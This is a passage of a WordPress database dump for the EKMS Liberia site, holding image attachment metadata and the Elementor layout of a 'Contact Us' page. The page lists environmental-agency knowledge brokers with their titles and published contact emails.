metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:27:\"2020/12/baselconvention.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"baselconvention-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"baselconvention-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24318,3247,'_pods_file_type_image','a:1:{i:0;i:3572;}'),(24321,2658,'_last_editor_used_jetpack','classic-editor'),(24322,3574,'_wp_attached_file','2019/11/waste.png'),(24323,3574,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:17:\"2019/11/waste.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"waste-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"waste-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24324,2658,'_pods_file_type_image','a:1:{i:0;i:3574;}'),(24327,2309,'_last_editor_used_jetpack','classic-editor'),(24328,3575,'_wp_attached_file','2019/11/ppad.png'),(24329,3575,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:16:\"2019/11/ppad.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"ppad-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"ppad-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24330,2309,'_pods_file_type_image','a:1:{i:0;i:3575;}'),(24335,2609,'_last_editor_used_jetpack','classic-editor'),(24336,3576,'_wp_attached_file','2019/11/wildlifeact.png'),(24337,3576,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:427;s:4:\"file\";s:23:\"2019/11/wildlifeact.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"wildlifeact-211x300.png\";s:5:\"width\";i:211;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"wildlifeact-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(24338,2609,'_pods_file_type_image','a:1:{i:0;i:3576;}'),(24343,2297,'_last_editor_used_jetpack','classic-editor'),(24344,110,'_last_editor_used_jetpack','block-editor'),(24345,87,'_last_editor_used_jetpack','block-editor'),(24346,3181,'_last_editor_used_jetpack','classic-editor'),(24347,3235,'_last_editor_used_jetpack','block-editor'),(24348,3585,'_last_editor_used_jetpack','classic-editor'),(24349,3585,'_edit_lock','1629377900:42'),(24350,3585,'_edit_last','42'),(24353,3588,'_elementor_edit_mode','builder'),(24354,3588,'_elementor_template_type','wp-page'),(24355,3588,'_elementor_version','3.0.16'),(24356,3588,'_wp_page_template','default'),(24357,3588,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isI